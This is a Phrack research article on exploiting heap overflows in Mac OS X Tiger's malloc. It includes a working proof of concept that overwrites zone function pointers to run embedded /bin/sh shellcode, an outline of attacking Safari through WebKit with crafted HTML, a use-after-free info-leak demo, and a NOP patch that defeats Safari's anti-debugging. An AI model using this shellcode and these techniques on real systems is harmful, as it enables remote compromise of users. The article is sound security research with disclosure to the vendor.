Title : OSX heap exploitation techniques
Author : Nemo
==Phrack Inc.==
Volume 0x0b, Issue 0x3f, Phile #0x05 of 0x14
|=---------------=[ OS X heap exploitation techniques ]=---------------=|
|=----------------------------------------------------------------------=|
|=------------------=[ nemo <[email protected]> ]=------------------=|
--[ Table of contents
1 - Introduction
2 - Overview of the Apple OS X userland heap implementation
2.1 - Environment Variables
2.2 - Zones
2.3 - Blocks
2.4 - Heap initialization
3 - A sample overflow
4 - A real life example (WebKit)
5 - Miscellaneous
5.1 - Wrap-around Bug
5.2 - Double free()'s
5.3 - Beating ptrace()
6 - Conclusion
7 - References
--[ 1 - Introduction.
This article comes as a result of my experiences exploiting a heap
overflow in the default web browser (Safari) on Mac OS X. It assumes a
small amount of knowledge of PPC assembly. A reference for this has
been provided in the references section below. (4). Also, knowledge of
other memory allocators will come in useful, however it's not necessarily
needed. All code in this paper was compiled and tested on Mac OS X -
Tiger (10.4) running on PPC32 (power pc) architecture.
--[ 2 - Overview of the Apple OS X userland heap implementation.
The malloc() implementation found in Apple's Libc-391 and earlier (at the
time of writing this) is written by Bertrand Serlet. It is a relatively
complex memory allocator made up of memory "zones", which are variable
size portions of virtual memory, and "blocks", which are allocated from
within these zones. It is possible to have multiple zones, however most
applications tend to stick to just using the default zone.
So far this memory allocator is used in all releases of OS X so far. It
is also used by the Open Darwin project [8] on x86 architecture, however
this isn't covered in the paper.
The source for the implementation of the Apple malloc() is available from
[6]. (The current version of the source at the time of writing this is
10.4.1).
To access it you need to be a member of the ADC, which is free to sign up.
(or if you can't be bothered signing up use the login/password from
Bug Me Not [7] ;)
----[ 2.1 - Environment Variables.
A series of environment variables can be set, to modify the behavior of
the memory allocation functions. These can be seen by setting the
"MallocHelp" variable, and then calling the malloc() function. They are
also shown in the malloc() manpage.
We will now look at the variables which are of the most use to us when
exploiting an overflow.
[ MallocStackLogging ] -:- When this variable is set a record is kept of
all the malloc operations that occur. With this variable set the "leaks"
tool can be used to search a processes memory for malloc()'ed buffers
which are unreferenced.
[ MallocStackLoggingNoCompact ] -:- When this variable is set, the record
of malloc operation is kept in a manner in which the "malloc_history"
tool is able to parse. The malloc_history tool is used to list the
allocations and deallocations which have been performed by the process.
[ MallocPreScribble ] -:- This environment variable, can be used to fill
memory which has been allocated with 0xaa. This can be useful to easily
see where buffers are located in memory. It can also be useful when
scripting gdb to investigate the heap.
[ MallocScribble ] -:- This variable is used to fill de-allocated
memory with 0x55. This, like MallocPreScribble is useful for
making it easier to inspect the memory layout. Also this will make
a program more likely to crash when it's accessing data it's not supposed
to.
[ MallocBadFreeAbort ] -:- This variable causes a SIGABRT to be sent to
the program when a pointer is passed to free() which is not listed as
allocated. This can be useful to halt execution at the exact point an
error occurred in order to assess what has happened.
NOTE: The "heap" tool can be used to inspect the current heap of a
process the Zones are displayed as well as any objects which are
currently allocated. This tool can be used without setting an
environment variable.
----[ 2.2 - Zones.
A single zone can be thought of a single heap. When the zone is destroyed
all the blocks allocated within it are free()'ed. Zones allow blocks with
similar attributes to be placed together. The zone itself is described by
a malloc_zone_t struct (defined in /usr/include/malloc.h) which is shown
below:
[malloc_zone_t struct]
typedef struct _malloc_zone_t {
/* Only zone implementors should depend on the layout of this
structure; Regular callers should use the access functions below */
void *reserved1; /* RESERVED FOR CFAllocator DO NOT USE */
void *reserved2; /* RESERVED FOR CFAllocator DO NOT USE */
size_t (*size)(struct _malloc_zone_t *zone, const void *ptr);
void *(*malloc)(struct _malloc_zone_t *zone, size_t size);
void *(*calloc)(struct _malloc_zone_t *zone, size_t num_items,
size_t size);
void *(*valloc)(struct _malloc_zone_t *zone, size_t size);
void (*free)(struct _malloc_zone_t *zone, void *ptr);
void *(*realloc)(struct _malloc_zone_t *zone, void *ptr,
size_t size);
void (*destroy)(struct _malloc_zone_t *zone);
const char *zone_name;
/* Optional batch callbacks; these may be NULL */
unsigned (*batch_malloc)(struct _malloc_zone_t *zone, size_t size,
void **results, unsigned num_requested);
void (*batch_free)(struct _malloc_zone_t *zone,
void **to_be_freed, unsigned num_to_be_freed);
struct malloc_introspection_t *introspect;
unsigned version;
} malloc_zone_t;
(Well, technically zones are scalable szone_t structs, however the first
element of a szone_t struct consists of a malloc_zone_t struct. This
struct is the most important for us to be familiar with to exploit heap
bugs using the method shown in this paper.)
As you can see, the zone struct contains function pointers for each of the
memory allocation / deallocation functions. This should give you a
pretty good idea of how we can control execution after an overflow.
Most of these functions are pretty self explanatory, the malloc,calloc,
valloc free, and realloc function pointers perform the same
functionality they do on Linux/BSD.
The size function is used to return the size of the memory allocated. The
destroy() function is used to destroy the entire zone and free all memory
allocated in it.
The batch_malloc and batch_free functions to the best of my understanding
are used to allocate (or deallocate) several blocks of the same size.
NOTE:
The malloc_good_size() function is used to return the size of the buffer
after rounding has occurred. An interesting note about this function is
that it contains the same wrap mentioned in 5.1.
printf("0x%x\n",malloc_good_size(0xffffffff));
Will print 0x1000 on Mac OS X 10.4 (Tiger).
----[ 2.3 - Blocks.
Allocation of blocks occurs in different ways depending on the size of the
memory required. The size of all blocks allocated is always paragraph
aligned (a multiple of 16). Therefore an allocation of less than 16 will
always return 16, an allocation of 20 will return 32, etc.
The szone_t struct contains two pointers, for tiny and small block
allocation. These are shown below:
tiny_region_t *tiny_regions;
small_region_t *small_regions;
Memory allocations which are less than around 500 bytes in size
fall into the "tiny" range. These allocations are allocated from a
pool of vm_allocate()'ed regions of memory. Each of these regions
consists of a 1MB, (in 32-bit mode), or 2MB, (in 64-bit mode) heap.
Following this is some meta-data about the region. Regions are ordered
by ascending block size. When memory is deallocated it is added back to
the pool.
Free blocks contain the following meta-data:
(all fields are sizeof(void *) in size, except for "size" which is
sizeof(u_short)). Tiny sized buffers are instead aligned to 0x10 bytes)
- checksum
- previous
- next
- size
The size field contains the quantum count for the region. A quantum represents
the size of the allocated blocks of memory within the region.
Allocations of which size falls in the range between 500 bytes and four
virtual pages in size (0x4000) fall into the "small" category.
Memory allocations of "small" range sized blocks, are allocated from a
pool of small regions, pointed to by the "small_regions" pointer in the
szone_t struct. Again this memory is pre-allocated with the vm_allocate()
function. Each "small" region consists of an 8MB heap, followed by the
same meta-data as tiny regions.
Tiny and small allocations are not always guaranteed to be page aligned.
If a block is allocated which is less than a single virtual page size then
obviously the block cannot be aligned to a page.
Large block allocations (allocations over four vm pages in size), are
handled quite differently to the small and tiny blocks. When a large
block is requested, the malloc() routine uses vm_allocate() to obtain the
memory required. Larger memory allocations occur in the higher memory of
the heap. This is useful in the "destroying the heap" technique, outlined
in this paper. Large blocks of memory are allocated in multiples of 4096.
This is the size of a virtual memory page. Because of this, large memory
allocations are always guaranteed to be page-aligned.
----[ 2.4 - Heap initialization.
As you can see below, the malloc() function is merely a wrapper around
the malloc_zone_malloc() function.
void *malloc(size_t size)
{
void *retval;
retval = malloc_zone_malloc(inline_malloc_default_zone(), size);
if (retval == NULL)
{
errno = ENOMEM;
}
return retval;
}
It uses the inline_malloc_default_zone() function to pass the appropriate
zone to malloc_zone_malloc(). If malloc() is being called for the first
time the inline_malloc_default_zone() function calls _malloc_initialize()
in order to create the initial default malloc zone.
The malloc_create_zone() function is called with the values (0,0) being
passed in as as the start_size and flags parameters.
After this the environment variables are read in (any beginning with
"Malloc"), and parsed in order to set the appropriate flags.
It then calls the create_scalable_zone() function in the scalable_malloc.c
file. This function is really responsible for creating the szone_t struct.
It uses the allocate_pages() function as shown below.
szone = allocate_pages(NULL, SMALL_REGION_SIZE, SMALL_BLOCKS_ALIGN, 0, \
VM_MAKE_TAG(VM_MEMORY_MALLOC));
This, in turn, uses the mach_vm_allocate() mach syscall to allocate the
required memory to store the s_zone_t default struct.
-[Summary]:
For the technique contained within this paper, the most important things
to note is that a szone_t struct is set up in memory. The struct contains
several function pointers which are used to store the address of each of
the appropriate allocation and deallocation functions. When a block of
memory is allocated which falls into the "large" category, the
vm_allocate() mach syscall is used to allocate the memory for this.
--[ 3 - A Sample Overflow
Before we look at how to exploit a heap overflow, we will first analyze
how the initial zone struct is laid out in the memory of a running
process.
To do this we will use gdb to debug a small sample program. This is
shown below:
-[nemo@gir:~]$ cat > mtst1.c
#include <stdlib.h>
int main(int ac, char **av)
{
char *a = malloc(10);
__asm("trap");
char *b = malloc(10);
}
-[nemo@gir:~]$ gcc mtst1.c -o mtst1
-[nemo@gir:~]$ gdb ./mtst1
GNU gdb 6.1-20040303 (Apple version gdb-413)
(gdb) r
Starting program: /Users/nemo/mtst1
Reading symbols for shared libraries . done
Once we receive a SIGTRAP signal and return to the gdb command shell we
can then use the command shown below to locate our initial szone_t
structure in the process memory.
(gdb) x/x &initial_malloc_zones
0xa0010414 <initial_malloc_zones>: 0x01800000
This value, as expected inside gdb, is shown to be 0x01800000.
If we dump memory at this location, we can see each of the fields in the
_malloc_zone_t_ struct as expected.
NOTE: Output reformatted for more clarity.
(gdb) x/x (long*) initial_malloc_zones
0x1800000: 0x00000000 // Reserved1.
0x1800004: 0x00000000 // Reserved2.
0x1800008: 0x90005e0c // size() pointer.
0x180000c: 0x90003abc // malloc() pointer.
0x1800010: 0x90008bc4 // calloc() pointer.
0x1800014: 0x9004a9f8 // valloc() pointer.
0x1800018: 0x900060ac // free() pointer.
0x180001c: 0x90017f90 // realloc() pointer.
0x1800020: 0x9010efb8 // destroy() pointer.
0x1800024: 0x00300000 // Zone Name
//("DefaultMallocZone").
0x1800028: 0x9010dbe8 // batch_malloc() pointer.
0x180002c: 0x9010e848 // batch_free() pointer.
In this struct we can see each of the function pointers which are called
for each of the memory allocation/deallocation functions performed using
the default zone. As well as a pointer to the name of the zone, which can
be useful for debugging.
If we change the malloc() function pointer, and continue our sample
program (shown below) we can see that the second call to malloc() results
in a jump to the specified value. (after instruction alignment).
(gdb) set *0x180000c = 0xdeadbeef
(gdb) jump *($pc + 4)
Continuing at 0x2cf8.
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeec
0xdeadbeec in ?? ()
(gdb)
But is it really feasible to write all the way to the address 0x1800000?
(or 0x2800000 outside of gdb). We will look into this now.
First we will check the addresses various sized memory allocations are
given. The location of each buffer is dependant on whether the
allocation size falls into one of the various sized bins mentioned
earlier (tiny, small or large).
To test the location of each of these we can simply compile and run the
following small c program as shown:
-[nemo@gir:~]$ cat > mtst2.c
#include <stdio.h>
#include <stdlib.h>
int main(int ac, char **av)
{
extern *malloc_zones;
printf("initial_malloc_zones @ 0x%x\n",*malloc_zones);
printf("tiny: %p\n",malloc(22));
printf("small: %p\n",malloc(500));
printf("large: %p\n",malloc(0xffffffff));
return 0;
}
-[nemo@gir:~]$ gcc mtst2.c -o mtst2
-[nemo@gir:~]$ ./mtst2
initial_malloc_zones @ 0x2800000
tiny: 0x500160
small: 0x2800600
large: 0x26000
From the output of this program we can see that it is only possible to
write to the initial_malloc_zones struct from a "tiny" or " large"
buffer. Also, in order to overwrite the function pointers contained within
this struct we need to write a considerable amount of data completely
destroying sections of the zone. Thankfully many situations exist in
typical software which allow these criteria to be met. This is discussed
in the final section of this paper.
Now we understand the layout of the heap a little better, we can use a
small sample program to overwrite the function pointers contained in the
struct to get a shell.
The following program allocates a 'tiny' buffer of 22 bytes. It then uses
memset() to write 'A's all the way to the pointer for malloc() in the
zone struct, before calling malloc().
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int ac, char **av)
{
extern *malloc_zones;
char *tmp,*tinyp = malloc(22);
printf("[+] tinyp is @ %p\n",tinyp);
printf("[+] initial_malloc_zones is @ %p\n", *malloc_zones);
printf("[+] Copying 0x%x bytes.\n",
(((char *)*malloc_zones + 16) - (char *)tinyp));
memset(tinyp,'A', (int)(((char *)*malloc_zones + 16) - (char *)tinyp));
tmp = malloc(0xdeadbeef);
return 0;
}
However when we compile and run this program, an EXC_BAD_ACCESS signal is
received.
(gdb) r
Starting program: /Users/nemo/mtst3
Reading symbols for shared libraries . done
[+] tinyp is @ 0x300120
[+] initial_malloc_zones is @ 0x1800000
[+] Copying 0x14ffef0 bytes.
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00405000
0xffff9068 in ___memset_pattern ()
This is due to the fact that, in between the tinyp pointer and the malloc
function pointer we are trying to overwrite there is some unmapped memory.
In order to get past this we can use the fact that blocks of memory
allocated which fall into the "large" category are allocated using the
mach vm_allocate() syscall.
If we can get enough memory to be allocated in the large classification,
before the overflow occurs we should have a clear path to the pointer.
To illustrate this point, we can use the following code:
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
#include <string.h>
char shellcode[] = // Shellcode by b-r00t, modified by nemo.
"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x39\x40\x01\xc3\x38\x0a\xfe\xf4"
"\x44\xff\xff\x02\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02\xa6\x38\x63\x01\x60"
"\x38\x63\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8"
"\x3b\xc0\x01\x47\x38\x1e\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x3b\xc0\x01\x0d\x38\x1e\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e"
"\x2f\x73\x68";
extern *malloc_zones;
int main(int ac, char **av)
{
char *tmp, *tmpr;
int a=0 , *addr;
while ((tmpr = malloc(0xffffffff)) <= (char *)*malloc_zones);
// small buffer
addr = malloc(22);
printf("[+] malloc_zones (first zone) @ 0x%x\n", *malloc_zones);
printf("[+] addr @ 0x%x\n",addr);
if ((unsigned int) addr < *malloc_zones)
{
printf("[+] addr + %u = 0x%x\n",
*malloc_zones - (int) addr, *malloc_zones);
exit(1);
}
printf("[+] Using shellcode @ 0x%x\n",&shellcode);
for (a = 0;
a <= ((*malloc_zones - (int) addr) + sizeof(malloc_zone_t)) / 4;
a++)
addr[a] = (int) &shellcode[0];
printf("[+] finished memcpy()\n");
tmp = malloc(5); // execve()
}
This code allocates enough "large" blocks of memory (0xffffffff) with
which to plow a clear path to the function pointers. It then copies
the address of the shellcode into memory all the way through the zone
before overwriting the function pointers in the szone_t struct. Finally a
call to malloc() is made in order to trigger the execution of the
shellcode.
As you can see below, this code function as we'd expect and our
shellcode is executed.
-[nemo@gir:~]$ ./heaptst
[+] malloc_zones (first zone) @ 0x2800000
[+] addr @ 0x500120
[+] addr + 36699872 = 0x2800000
[+] Using shellcode @ 0x3014
[+] finished memcpy()
sh-2.05b$
This method has been tested on Apple's OS X version 10.4.1 (Tiger).
--[ 4 - A Real Life Example
The default web browser on OS X (Safari) as well as the mail client
(Mail.app), Dashboard and almost every other application on OS X which
requires web parsing functionality achieve this through a library
which Apple call "WebKit". (2)
This library contains many bugs, many of which are exploitable using this
technique. Particular attention should be payed to the code which renders
<TABLE></TABLE> blocks ;)
Due to the nature of HTML pages an attacker is presented with
opportunities to control the heap in a variety of ways before actually
triggering the exploit. In order to use the technique described in this
paper to exploit these bugs we can craft some HTML code, or an image
file, to perform many large allocations and therefore cleaving a path
to our function pointers. We can then trigger one of the numerous
overflows to write the address of our shellcode into the function
pointers before waiting for a shell to be spawned.
One of the bugs which i have exploited using this particular method
involves an unchecked length being used to allocate and fill an object in
memory with null bytes (\x00).
If we manage to calculate the write so that it stops mid way through one
of our function pointers in the szone_t struct, we can effectively
truncate the pointer causing execution to jump elsewhere.
The first step to exploiting this bug, is to fire up the debugger (gdb)
and look at what options are available to us.
Once we have Safari loaded up in our debugger, the first thing we need
to check for the exploit to succeed is that we have a clear path to the
initial_malloc_zones struct. To do this in gdb we can put a breakpoint
on the return statement in the malloc() function.
We use the command "disas malloc" to view the assembly listing for the
malloc function. The end of this listing is shown below:
.....
0x900039dc <malloc+1464>: lwz r0,8(r1)
0x900039e0 <malloc+1468>: lmw r24,-32(r1)
0x900039e4 <malloc+1472>: lwz r11,4(r1)
0x900039e8 <malloc+1476>: mtlr r0
0x900039ec <malloc+1480>: .long 0x7d708120
0x900039f0 <malloc+1484>: blr
0x900039f4 <malloc+1488>: .long 0x0
The "blr" instruction shown at line 0x900039f0 is the "branch to link
register" instruction. This instruction is used to return from malloc().
Functions in OS X on PPC architecture pass their return value back to the
calling function in the "r3" register. In order to make sure that the
malloc()'ed addresses have reached the address of our zone struct we can
put a breakpoint on this instruction, and output the value which was
returned.
We can do this with the gdb commands shown below.
(gdb) break *0x900039f0
Breakpoint 1 at 0x900039f0
(gdb) commands
Type commands for when breakpoint 1 is hit, one per line.
End with a line saying just "end".
>i r r3
>cont
>end
We can now continue execution and receive a running status of all
allocations which occur in our program. This way we can see when our
target is reached.
The "heap" tool can also be used to see the sizes and numbers of each
allocation.
There are several methods which can be used to set up the heap
correctly for exploitation. One method, suggested by andrewg, is to use a
.png image in order to control the sizes of allocations which occur.
Apparently this method was learn from zen-parse when exploiting a
mozilla bug in the past.
The method which i have used is to create an HTML page which repeatedly
triggers the overflow with various sizes. After playing around with
this for a while, it was possible to regularly allocate enough memory
for the overflow to occur.
Once the limit is reached, it is possible to trigger the overflow in a
way which overwrites the first few bytes in any of the pointers in the
szone_t struct.
Because of the big endian nature of PPC architecture (by default. it can
be changed.) the first few bytes in the pointer make all the difference
and our truncated pointer will now point to the .TEXT segment.
The following gdb output shows our initial_malloc_zones struct after the
heap has been smashed.
(gdb) x/x (long )*&initial_malloc_zones
0x1800000: 0x00000000 // Reserved1.
(gdb)
0x1800004: 0x00000000 // Reserved2.
(gdb)
0x1800008: 0x00000000 // size() pointer.
(gdb)
0x180000c: 0x00003abc // malloc() pointer.
(gdb) ^^ smash stopped here.
0x1800010: 0x90008bc4
As you can see, the malloc() pointer is now pointing to somewhere in the
.TEXT segment, and the next call to malloc() will take us there. We can
use gdb to view the instructions at this address. As you can see in the
following example.
(gdb) x/2i 0x00003abc
0x3abc: lwz r4,0(r31)
0x3ac0: bl 0xd686c <dyld_stub_objc_msgSend>
Here we can see that the r31 register must be a valid memory address for
a start following this the dyld_stub_objc_msgSend() function is called
using the "bl" (branch updating link register) instruction. Again we can
use gdb to view the instructions in this function.
(gdb) x/4i 0xd686c
0xd686c <dyld_stub_objc_msgSend>: lis r11,14
0xd6870 <dyld_stub_objc_msgSend+4>: lwzu r12,-31732(r11)
0xd6874 <dyld_stub_objc_msgSend+8>: mtctr r12
0xd6878 <dyld_stub_objc_msgSend+12>: bctr
We can see in these instructions that the r11 register must be a valid
memory address. Other than that the final two instructions (0xd6874
and 0xd6878) move the value in the r12 register to the control
register, before branching to it. This is the equivalent of jumping to
a function pointer in r12. Amazingly this code construct is exactly
what we need.
So all that is needed to exploit this vulnerability now, is to find
somewhere in the binary where the r12 register is controlled by the user,
directly before the malloc function is called. Although this isn't
terribly easy to find, it does exist.
However, if this code is not reached before one of the pointers
contained on the (now smashed) heap is used the program will most
likely crash before we are given a chance to steal execution flow. Because
of this fact, and because of the difficult nature of predicting the exact
values with which to smash the heap, exploiting this vulnerability can be
very unreliable, however it definitely can be done.
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeec
0xdeadbeec in ?? ()
(gdb)
An exploit for this vulnerability means that a crafted email or website
is all that is needed to remotely exploit an OS X user.
Apple have been contacted about a couple of these bugs and are currently
in the process of fixing them.
The WebKit library is open source and available for download, apparently
it won't be too long before Nokia phones use this library for their web
applications. [5]
--[ 5 - Miscellaneous
This section shows a couple of situations / observations regarding the
memory allocator which did not fit in to any of the other sections.
----[ 5.1 - Wrap-around Bug.
The examples in this paper allocated the value 0xffffffff. However
this amount is not technically feasible for a malloc implementation
to allocate each time.
The reason this works without failure is due to a subtle bug which
exists in the Darwin kernel's vm_allocate() function.
This function attempts to round the desired size it up to the closest
page aligned value. However it accomplishes this by using the
vm_map_round_page() macro (shown below.)
#define PAGE_MASK (PAGE_SIZE - 1)
#define PAGE_SIZE vm_page_size
#define vm_map_round_page(x) (((vm_map_offset_t)(x) + \
PAGE_MASK) & ~((signed)PAGE_MASK))
Here we can see that the page size minus one is simply added to the value
which is to be rounded before being bitwise AND'ed with the reverse of
the PAGE_MASK.
The effect of this macro when rounding large values can be illustrated
using the following code:
#include <stdio.h>
#define PAGEMASK 0xfff
#define vm_map_round_page(x) ((x + PAGEMASK) & ~PAGEMASK)
int main(int ac, char **av)
{
printf("0x%x\n",vm_map_round_page(0xffffffff));
}
When run (below) it can be seen that the value 0xffffffff will be rounded
to 0.
-[nemo@gir:~]$ ./rounding
0x0
Directly below the rounding in vm_allocate() is performed there is a check
to make sure the rounded size is not zero. If it is zero then the size of
a page is added to it. Leaving only a single page allocated.
map_size = vm_map_round_page(size);
if (map_addr == 0)
map_addr += PAGE_SIZE;
The code below demonstrates the effect of this on two calls to malloc().
#include <stdio.h>
#include <stdlib.h>
int main(int ac, char **av)
{
char *a = malloc(0xffffffff);
char *b = malloc(0xffffffff);
printf("B - A: 0x%x\n", b - a);
return 0;
}
When this program is compiled and run (below) we can see that although the
programmer believes he/she now has a 4GB buffer only a single page has
been allocated.
-[nemo@gir:~]$ ./ovrflw
B - A: 0x1000
This means that most situations where a user specified length can be
passed to the malloc() function, before being used to copy data, are
exploitable.
This bug was pointed out to me by duke.
----[ 5.2 - Double free().
Bertrand's allocator keeps track of the addresses which are currently
allocated. When a buffer is free()'ed the find_registered_zone() function
is used to make sure that the address which is requested to be free()'ed
exists in one of the zones. This check is shown below.
void free(void *ptr)
{
malloc_zone_t *zone;
if (!ptr) return;
zone = find_registered_zone(ptr, NULL);
if (zone)
{
malloc_zone_free(zone, ptr);
}
else
{
malloc_printf("*** Deallocation of a pointer not malloced: %p; "
"This could be a double free(), or free() called "
"with the middle of an allocated block; "
"Try setting environment variable MallocHelp to see "
"tools that help to debug\n", ptr);
if (malloc_free_abort) abort();
}
}
This means that an address free()'ed twice (double free) will not
actually be free()'ed the second time. Making it hard to exploit
double free()'s in this way.
However, when a buffer is allocated of the same size as the previous
buffer and free()'ed, but the pointer to the free()'ed buffer still
exists and is used an exploitable condition can occur.
The small sample program below shows a pointer being allocated and
free()ed and then a second pointer being allocated of the same size. Then
free()ed twice.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int ac, char **av)
{
char *b,*a = malloc(11);
printf("a: %p\n",a);
free(a);
b = malloc(11);
printf("b: %p\n",b);
free(b);
printf("b: %p\n",a);
free(b);
printf("a: %p\n",a);
return 0;
}
When we compile and run it, as shown below, we can see that pointer "a"
still points to the same address as "b", even after it was free()'ed.
If this condition occurs and we are able to write to,or read from,
pointer "a", we may be able to exploit this for an info leak, or gain
control of execution.
-[nemo@gir:~]$ ./dfr
a: 0x500120
b: 0x500120
b: 0x500120
tst(3575) malloc: *** error for object 0x500120: double free
tst(3575) malloc: *** set a breakpoint in szone_error to debug
a: 0x500120
I have written a small sample program to explain more clearly how this
works. The code below reads a username and password from the user.
It then compares password to one stored in the file ".skrt". If this
password is the same, the secret code is revealed. Otherwise an error is
printed informing the user that the password was incorrect.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define PASSWDFILE ".skrt"
int main(int ac, char **av)
{
char *user = malloc(128 + 1);
char *p,*pass = "" ,*skrt = NULL;
FILE *fp;
printf("login: ");
fgets(user,128,stdin);
if (p = strchr(user,'\n'))
*p = '\x00';
// If the username contains "admin_", exit.
if(strstr(user,"admin_"))
{
printf("Admin user not allowed!\n");
free(user);
fflush(stdin);
goto exit;
}
pass = getpass("Enter your password: ");
exit:
if ((fp = fopen(PASSWDFILE,"r")) == NULL)
{
printf("Error loading password file.\n");
exit(1);
}
skrt = malloc(128 + 1);
if (!fgets(skrt,128,fp))
{
exit(1);
}
if (p = strchr(skrt,'\n'))
*p = '\x00';
if (!strcmp(pass,skrt))
{
printf("The combination is 2C,4B,5C\n");
}
else
{
printf("Password Rejected for %s, please try again\n");
user);
}
fclose(fp);
return 0;
}
When we compile the program and enter an incorrect password we see the
following message:
-[nemo@gir:~]$ ./dfree
login: nemo
Enter your password:
Password Rejected for nemo, please try again.
However, if the "admin_" string is detected in the string, the user
buffer is free()'ed. The skrt buffer is then returned from malloc()
pointing to the same allocated block of memory as the user pointer.
This would normally be fine however the user buffer is used in the
printf() function call at the end of the function. Because the user
pointer still points to the same memory as skrt this causes an
info-leak and the secret password is printed, as seen below:
-[nemo@gir:~]$ ./dfree
login: admin_nemo
Admin user not allowed!
Password Rejected for secret_password, please try again.
We can then use this password to get the combination:
-[nemo@gir:~]$ ./dfree
login: nemo
Enter your password:
The combination is 2C,4B,5C
----[ 5.3 - Beating ptrace()
Safari uses the ptrace() syscall to try and stop evil hackers from
debugging their proprietary code. ;). The extract from the
man-page below shows a ptrace() flag which can be used to stop people
being able to debug your code.
PT_DENY_ATTACH
This request is the other operation used by the traced
process; it allows a process that is not currently being
traced to deny future traces by its parent. All other
arguments are ignored. If the process is currently being
traced, it will exit with the exit status of ENOTSUP; oth-
erwise, it sets a flag that denies future traces. An
attempt by the parent to trace a process which has set this
flag will result in a segmentation violation in the parent.
There are a couple of ways to get around this check (which i am aware of).
The first of these is to patch your kernel to stop the PT_DENY_ATTACH call
from doing anything. This is probably the best way, however involves the
most effort.
The method which we will use now to look at Safari is to start up gdb and
put a breakpoint on the ptrace() function. This is shown below:
-[nemo@gir:~]$ gdb /Applications/Safari.app/Contents/MacOS/Safari
GNU gdb 6.1-20040303 (Apple version gdb-413)
(gdb) break ptrace
Breakpoint 1 at 0x900541f4
We then run the program, and wait until the breakpoint is hit. When our
breakpoint is triggered, we use the x/10i $pc command (below) to view the
next 10 instructions in the function.
(gdb) r
Starting program: /Applications/Safari.app/Contents/MacOS/Safari
Reading symbols for shared libraries .................... done
Breakpoint 1, 0x900541f4 in ptrace ()
(gdb) x/10i $pc
0x900541f4 <ptrace+20>: addis r8,r8,4091
0x900541f8 <ptrace+24>: lwz r8,7860(r8)
0x900541fc <ptrace+28>: stw r7,0(r8)
0x90054200 <ptrace+32>: li r0,26
0x90054204 <ptrace+36>: sc
0x90054208 <ptrace+40>: b 0x90054210 <ptrace+48>
0x9005420c <ptrace+44>: b 0x90054230 <ptrace+80>
0x90054210 <ptrace+48>: mflr r0
0x90054214 <ptrace+52>: bcl- 20,4*cr7+so,0x90054218
0x90054218 <ptrace+56>: mflr r12
At line 0x90054204 we can see the instruction "sc" being executed. This
is the instruction which calls the syscall itself. This is similar to
int 0x80 on a Linux platform, or sysenter/int 0x2e in windows.
In order to stop the ptrace() syscall from occurring we can simply
replace this instruction in memory with a nop (no operation)
instruction. This way the syscall will never take place and we can
debug without any problems.
To patch this instruction in gdb we can use the command shown below and
continue execution.
(gdb) set *0x90054204 = 0x60000000
(gdb) continue
--[ 6 - Conclusion
Although the technique which was described in this paper seem rather
specific, the technique is still valid and exploitation of heap bugs in
this way is definitely possible.
When you are able to exploit a bug in this way you can quickly turn a
complicated bug into the equivalent of a simple stack smash (3).
At the time of writing this paper, no protection schemes for the heap
exist for Mac OS X which would stop this technique from working. (To my
knowledge).
On a side note, if anyone works out why the initial_malloc_zones struct is
always located at 0x2800000 outside of gdb and 0x1800000 inside i would
appreciate it if you let me know.
I'd like to say thanks to my boss Swaraj from Suresec LTD for giving me
time to research the things which i enjoy so much.
I'd also like to say hi to all the guys at Feline Menace, as well as
pulltheplug.org/#social and the Ruxcon team. I'd also like to thank the
Chelsea for providing the AU felinemenace guys with buckets of corona to
fuel our hacking. Thanks as well to duke for pointing out the vm_allocate()
bug and ilja for discussing all of this with me on various occasions.
"Free wd jail mitnick!"
--[ 7 - References
1) Apple Memory Usage performance Guidelines:
- http://developer.apple.com/documentation/Performance/Conceptual/
ManagingMemory/Articles/MemoryAlloc.html
2) WebKit:
- http://webkit.opendarwin.org/
3) Smashing the stack for fun and profit:
- http://www.phrack.org/show.php?p=49&a=14
4) Mac OS X Assembler Guide
- http://developer.apple.com/documentation/DeveloperTools/
Reference/Assembler/index.html
5) Slashdot - Nokia Using WebKit
- http://apple.slashdot.org/article.pl?sid=05/06/13/1158208
6) Darwin Source.
- http://www.opensource.apple.com/darwinsource/curr.version.number
7) Bug Me Not
- http://www.bugmenot.com
8) Open Darwin
- http://www.opendarwin.org
|=[ EOF ]=--------------------------------------------------------------=|